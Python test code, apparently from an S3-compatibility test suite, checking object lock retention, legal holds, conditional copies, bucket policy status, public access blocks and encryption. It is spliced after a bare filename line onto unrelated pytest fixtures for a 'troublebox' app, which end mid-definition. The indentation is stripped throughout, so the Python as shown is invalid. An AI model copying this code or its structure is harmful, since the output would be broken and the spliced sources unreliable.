retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,3,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention to shorten period with bypass header')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention_shorten_period_bypass():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,3,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention, BypassGovernanceRetention=True)
response = client.get_object_retention(Bucket=bucket_name, Key=key)
eq(response['Retention'], retention)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='Test delete object with retention')
@attr(assertion='retention period takes effect')
@attr('object-lock')
def test_object_lock_delete_object_with_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
e = assert_raises(ClientError, client.delete_object, Bucket=bucket_name, Key=key, VersionId=response['VersionId'])
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
response = client.delete_object(Bucket=bucket_name, Key=key, VersionId=response['VersionId'], BypassGovernanceRetention=True)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
@attr(resource='object')
@attr(method='delete')
@attr(operation='Test multi-delete object with retention')
@attr(assertion='retention period takes effect')
@attr('object-lock')
def test_object_lock_multi_delete_object_with_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key1 = 'file1'
key2 = 'file2'
response1 = client.put_object(Bucket=bucket_name, Body='abc', Key=key1)
response2 = client.put_object(Bucket=bucket_name, Body='abc', Key=key2)
versionId1 = response1['VersionId']
versionId2 = response2['VersionId']
# key1 is under retention, but key2 isn't.
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key1, Retention=retention)
delete_response = client.delete_objects(
Bucket=bucket_name,
Delete={
'Objects': [
{
'Key': key1,
'VersionId': versionId1
},
{
'Key': key2,
'VersionId': versionId2
}
]
}
)
eq(len(delete_response['Deleted']), 1)
eq(len(delete_response['Errors']), 1)
failed_object = delete_response['Errors'][0]
eq(failed_object['Code'], 'AccessDenied')
eq(failed_object['Key'], key1)
eq(failed_object['VersionId'], versionId1)
deleted_object = delete_response['Deleted'][0]
eq(deleted_object['Key'], key2)
eq(deleted_object['VersionId'], versionId2)
delete_response = client.delete_objects(
Bucket=bucket_name,
Delete={
'Objects': [
{
'Key': key1,
'VersionId': versionId1
}
]
},
BypassGovernanceRetention=True
)
assert( ('Errors' not in delete_response) or (len(delete_response['Errors']) == 0) )
eq(len(delete_response['Deleted']), 1)
deleted_object = delete_response['Deleted'][0]
eq(deleted_object['Key'], key1)
eq(deleted_object['VersionId'], versionId1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put legal hold')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_legal_hold():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'ON'}
response = client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold=legal_hold)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status':'OFF'})
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put legal hold with invalid bucket')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_legal_hold_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'ON'}
e = assert_raises(ClientError, client.put_object_legal_hold, Bucket=bucket_name, Key=key, LegalHold=legal_hold)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put legal hold with invalid status')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_legal_hold_invalid_status():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'abc'}
e = assert_raises(ClientError, client.put_object_legal_hold, Bucket=bucket_name, Key=key, LegalHold=legal_hold)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get legal hold')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_legal_hold():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'ON'}
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold=legal_hold)
response = client.get_object_legal_hold(Bucket=bucket_name, Key=key)
eq(response['LegalHold'], legal_hold)
legal_hold_off = {'Status': 'OFF'}
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold=legal_hold_off)
response = client.get_object_legal_hold(Bucket=bucket_name, Key=key)
eq(response['LegalHold'], legal_hold_off)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get legal hold with invalid bucket')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_get_legal_hold_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
e = assert_raises(ClientError, client.get_object_legal_hold, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='Test delete object with legal hold on')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_delete_object_with_legal_hold_on():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status': 'ON'})
e = assert_raises(ClientError, client.delete_object, Bucket=bucket_name, Key=key, VersionId=response['VersionId'])
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status':'OFF'})
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='Test delete object with legal hold off')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_delete_object_with_legal_hold_off():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status': 'OFF'})
response = client.delete_object(Bucket=bucket_name, Key=key, VersionId=response['VersionId'])
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object metadata')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_obj_metadata():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'ON'}
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold=legal_hold)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ObjectLockMode'], retention['Mode'])
eq(response['ObjectLockRetainUntilDate'], retention['RetainUntilDate'])
eq(response['ObjectLockLegalHoldStatus'], legal_hold['Status'])
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status':'OFF'})
client.delete_object(Bucket=bucket_name, Key=key, VersionId=response['VersionId'], BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put legal hold and retention when uploading object')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_uploading_obj():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key, ObjectLockMode='GOVERNANCE',
ObjectLockRetainUntilDate=datetime.datetime(2030,1,1,tzinfo=pytz.UTC), ObjectLockLegalHoldStatus='ON')
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ObjectLockMode'], 'GOVERNANCE')
eq(response['ObjectLockRetainUntilDate'], datetime.datetime(2030,1,1,tzinfo=pytz.UTC))
eq(response['ObjectLockLegalHoldStatus'], 'ON')
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status':'OFF'})
client.delete_object(Bucket=bucket_name, Key=key, VersionId=response['VersionId'], BypassGovernanceRetention=True)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test changing object retention mode from GOVERNANCE to COMPLIANCE with bypass')
@attr(assertion='succeeds')
@attr('object-lock')
def test_object_lock_changing_mode_from_governance_with_bypass():
bucket_name = get_new_bucket_name()
key = 'file1'
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
# upload object with mode=GOVERNANCE
retain_until = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=10)
client.put_object(Bucket=bucket_name, Body='abc', Key=key, ObjectLockMode='GOVERNANCE',
ObjectLockRetainUntilDate=retain_until)
# change mode to COMPLIANCE
retention = {'Mode':'COMPLIANCE', 'RetainUntilDate':retain_until}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention, BypassGovernanceRetention=True)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test changing object retention mode from GOVERNANCE to COMPLIANCE without bypass')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_changing_mode_from_governance_without_bypass():
bucket_name = get_new_bucket_name()
key = 'file1'
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
# upload object with mode=GOVERNANCE
retain_until = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=10)
client.put_object(Bucket=bucket_name, Body='abc', Key=key, ObjectLockMode='GOVERNANCE',
ObjectLockRetainUntilDate=retain_until)
# try to change mode to COMPLIANCE
retention = {'Mode':'COMPLIANCE', 'RetainUntilDate':retain_until}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='object')
@attr(method='put')
@attr(operation='Test changing object retention mode from COMPLIANCE to GOVERNANCE')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_changing_mode_from_compliance():
bucket_name = get_new_bucket_name()
key = 'file1'
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
# upload object with mode=COMPLIANCE
retain_until = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=10)
client.put_object(Bucket=bucket_name, Body='abc', Key=key, ObjectLockMode='COMPLIANCE',
ObjectLockRetainUntilDate=retain_until)
# try to change mode to GOVERNANCE
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':retain_until}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='object')
@attr(method='copy')
@attr(operation='copy w/ x-amz-copy-source-if-match: the latest ETag')
@attr(assertion='succeeds')
def test_copy_object_ifmatch_good():
bucket_name = get_new_bucket()
client = get_client()
resp = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
client.copy_object(Bucket=bucket_name, CopySource=bucket_name+'/foo', CopySourceIfMatch=resp['ETag'], Key='bar')
response = client.get_object(Bucket=bucket_name, Key='bar')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='copy')
@attr(operation='copy w/ x-amz-copy-source-if-match: bogus ETag')
@attr(assertion='fails 412')
# TODO: remove fails_on_rgw when https://tracker.ceph.com/issues/40808 is resolved
@attr('fails_on_rgw')
def test_copy_object_ifmatch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
e = assert_raises(ClientError, client.copy_object, Bucket=bucket_name, CopySource=bucket_name+'/foo', CopySourceIfMatch='ABCORZ', Key='bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
@attr(resource='object')
@attr(method='copy')
@attr(operation='copy w/ x-amz-copy-source-if-none-match: the latest ETag')
@attr(assertion='fails 412')
# TODO: remove fails_on_rgw when https://tracker.ceph.com/issues/40808 is resolved
@attr('fails_on_rgw')
def test_copy_object_ifnonematch_good():
bucket_name = get_new_bucket()
client = get_client()
resp = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
e = assert_raises(ClientError, client.copy_object, Bucket=bucket_name, CopySource=bucket_name+'/foo', CopySourceIfNoneMatch=resp['ETag'], Key='bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
@attr(resource='object')
@attr(method='copy')
@attr(operation='copy w/ x-amz-copy-source-if-none-match: bogus ETag')
@attr(assertion='succeeds')
def test_copy_object_ifnonematch_failed():
bucket_name = get_new_bucket()
client = get_client()
resp = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
client.copy_object(Bucket=bucket_name, CopySource=bucket_name+'/foo', CopySourceIfNoneMatch='ABCORZ', Key='bar')
response = client.get_object(Bucket=bucket_name, Key='bar')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='get')
@attr(operation='read to invalid key')
@attr(assertion='fails 400')
# TODO: results in a 404 instead of 400 on the RGW
@attr('fails_on_rgw')
def test_object_read_unreadable():
bucket_name = get_new_bucket()
client = get_client()
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='\xae\x8a-')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(e.response['Error']['Message'], 'Couldn\'t parse the specified URI.')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test User Policy')
@attr(assertion='succeeds')
@attr('user-policy')
def test_user_policy():
client = get_tenant_iam_client()
policy_document = json.dumps(
{"Version":"2012-10-17",
"Statement": {
"Effect":"Allow",
"Action":"*",
"Resource":"*"}}
)
client.put_user_policy(
PolicyDocument= policy_document,
PolicyName='AllAccessPolicy',
UserName=get_tenant_user_id(),
)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a new bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_bucket_policy_status():
bucket_name = get_new_bucket()
client = get_client()
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a public acl bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_public_acl_bucket_policy_status():
bucket_name = get_new_bucket()
    client = get_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on an authenticated acl bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_authpublic_acl_bucket_policy_status():
bucket_name = get_new_bucket()
    client = get_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='authenticated-read')
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a public policy bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_publicpolicy_acl_bucket_policy_status():
bucket_name = get_new_bucket()
    client = get_client()
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a nonpublic policy bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_nonpublicpolicy_acl_bucket_policy_status():
bucket_name = get_new_bucket()
    client = get_client()
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
],
"Condition": {
"IpAddress":
{"aws:SourceIp": "10.0.0.0/32"}
}
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a NotPrincipal policy bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_nonpublicpolicy_deny_bucket_policy_status():
bucket_name = get_new_bucket()
client = get_client()
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"NotPrincipal": {"AWS": "arn:aws:iam::s3tenant1:root"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
],
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get public access block on a bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_default_public_block():
#client = get_svc_client(svc='s3control', client_config=Config(s3={'addressing_style': 'path'}))
bucket_name = get_new_bucket()
client = get_client()
resp = client.get_public_access_block(Bucket=bucket_name)
eq(resp['PublicAccessBlockConfiguration']['BlockPublicAcls'], False)
eq(resp['PublicAccessBlockConfiguration']['BlockPublicPolicy'], False)
eq(resp['PublicAccessBlockConfiguration']['IgnorePublicAcls'], False)
eq(resp['PublicAccessBlockConfiguration']['RestrictPublicBuckets'], False)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='put public access block on a bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_put_public_block():
#client = get_svc_client(svc='s3control', client_config=Config(s3={'addressing_style': 'path'}))
bucket_name = get_new_bucket()
client = get_client()
access_conf = {'BlockPublicAcls': True,
'IgnorePublicAcls': True,
'BlockPublicPolicy': True,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
resp = client.get_public_access_block(Bucket=bucket_name)
eq(resp['PublicAccessBlockConfiguration']['BlockPublicAcls'], access_conf['BlockPublicAcls'])
eq(resp['PublicAccessBlockConfiguration']['BlockPublicPolicy'], access_conf['BlockPublicPolicy'])
eq(resp['PublicAccessBlockConfiguration']['IgnorePublicAcls'], access_conf['IgnorePublicAcls'])
eq(resp['PublicAccessBlockConfiguration']['RestrictPublicBuckets'], access_conf['RestrictPublicBuckets'])
@attr(resource='bucket')
@attr(method='put')
@attr(operation='block public canned acls on a bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_block_public_put_bucket_acls():
#client = get_svc_client(svc='s3control', client_config=Config(s3={'addressing_style': 'path'}))
bucket_name = get_new_bucket()
client = get_client()
access_conf = {'BlockPublicAcls': True,
'IgnorePublicAcls': False,
'BlockPublicPolicy': True,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
resp = client.get_public_access_block(Bucket=bucket_name)
eq(resp['PublicAccessBlockConfiguration']['BlockPublicAcls'], access_conf['BlockPublicAcls'])
eq(resp['PublicAccessBlockConfiguration']['BlockPublicPolicy'], access_conf['BlockPublicPolicy'])
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name,ACL='public-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name,ACL='public-read-write')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name,ACL='authenticated-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='block public acls on canned acls')
@attr(assertion='succeeds')
@attr('policy_status')
def test_block_public_object_canned_acls():
bucket_name = get_new_bucket()
client = get_client()
access_conf = {'BlockPublicAcls': True,
'IgnorePublicAcls': False,
'BlockPublicPolicy': False,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
# resp = client.get_public_access_block(Bucket=bucket_name)
# eq(resp['PublicAccessBlockConfiguration']['BlockPublicAcls'], access_conf['BlockPublicAcls'])
# eq(resp['PublicAccessBlockConfiguration']['BlockPublicPolicy'], access_conf['BlockPublicPolicy'])
#FIXME: use empty body until #42208
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo1', Body='', ACL='public-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
    e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo2', Body='', ACL='public-read-write')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo3', Body='', ACL='authenticated-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='block public policy on a bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_block_public_policy():
bucket_name = get_new_bucket()
client = get_client()
access_conf = {'BlockPublicAcls': False,
'IgnorePublicAcls': False,
'BlockPublicPolicy': True,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObject",
resource)
check_access_denied(client.put_bucket_policy, Bucket=bucket_name, Policy=policy_document)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='ignore public acls on a bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_ignore_public_acls():
bucket_name = get_new_bucket()
client = get_client()
alt_client = get_alt_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
# Public bucket should be accessible
alt_client.list_objects(Bucket=bucket_name)
client.put_object(Bucket=bucket_name,Key='key1',Body='abcde',ACL='public-read')
resp=alt_client.get_object(Bucket=bucket_name, Key='key1')
eq(_get_body(resp), 'abcde')
access_conf = {'BlockPublicAcls': False,
'IgnorePublicAcls': True,
'BlockPublicPolicy': False,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
# IgnorePublicACLs is true, so regardless this should behave as a private bucket
check_access_denied(alt_client.list_objects, Bucket=bucket_name)
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key='key1')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='multipart upload on a bucket with a policy')
@attr(assertion='succeeds')
@attr('policy_status')
def test_multipart_upload_on_a_bucket_with_policy():
bucket_name = get_new_bucket()
client = get_client()
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": "*",
"Action": "*",
"Resource": [
resource1,
resource2
],
}]
})
key = "foo"
objlen=50*1024*1024
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, client=client)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='put bucket encryption on bucket')
@attr(assertion='succeeds')
def test_put_bucket_encryption():
bucket_name = get_new_bucket()
client = get_client()
server_side_encryption_conf = {
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
},
]
}
response = client.put_bucket_encryption(Bucket=bucket_name, ServerSideEncryptionConfiguration=server_side_encryption_conf)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket encryption on bucket')
@attr(assertion='succeeds')
def test_get_bucket_encryption():
bucket_name = get_new_bucket()
client = get_client()
response_code = ""
try:
client.get_bucket_encryption(Bucket=bucket_name)
except ClientError as e:
response_code = e.response['Error']['Code']
eq(response_code, 'ServerSideEncryptionConfigurationNotFoundError')
server_side_encryption_conf = {
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
},
]
}
client.put_bucket_encryption(Bucket=bucket_name, ServerSideEncryptionConfiguration=server_side_encryption_conf)
response = client.get_bucket_encryption(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(response['ServerSideEncryptionConfiguration']['Rules'][0]['ApplyServerSideEncryptionByDefault']['SSEAlgorithm'],
server_side_encryption_conf['Rules'][0]['ApplyServerSideEncryptionByDefault']['SSEAlgorithm'])
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='delete bucket encryption on bucket')
@attr(assertion='succeeds')
def test_delete_bucket_encryption():
bucket_name = get_new_bucket()
client = get_client()
response = client.delete_bucket_encryption(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
server_side_encryption_conf = {
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
},
]
}
client.put_bucket_encryption(Bucket=bucket_name, ServerSideEncryptionConfiguration=server_side_encryption_conf)
response = client.delete_bucket_encryption(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
|
test_functional.py
|
from contextlib import closing
import pytest
import socket
import time
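# The fixtures below build a throwaway troublebox instance for the tests: a
# WSGI app backed by a temporary SQLite database, served by wsgiref in a
# daemon thread, with both the legacy raven client and sentry_sdk pointed at
# its DSN.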
def get_open_port(host):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
return port
def wait_for_port(host, port, timeout=60):
while timeout > 0:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.settimeout(1)
if s.connect_ex((host, port)) == 0:
return
time.sleep(1)
timeout -= 1
raise RuntimeError(
"The port %s on host %s didn't become accessible" % (port, host))
@pytest.fixture
def app(tmp_path):
from troublebox import make_app
from troublebox.models import Base
import transaction
sqlite_path = tmp_path / 'troublebox.sqlite'
app = make_app(None, **{
'sqlalchemy.url': 'sqlite:///%s' % sqlite_path})
sessionmaker = app.registry['dbsession_factory']
session = sessionmaker()
Base.metadata.bind = session.bind
Base.metadata.create_all()
transaction.commit()
return app
@pytest.fixture
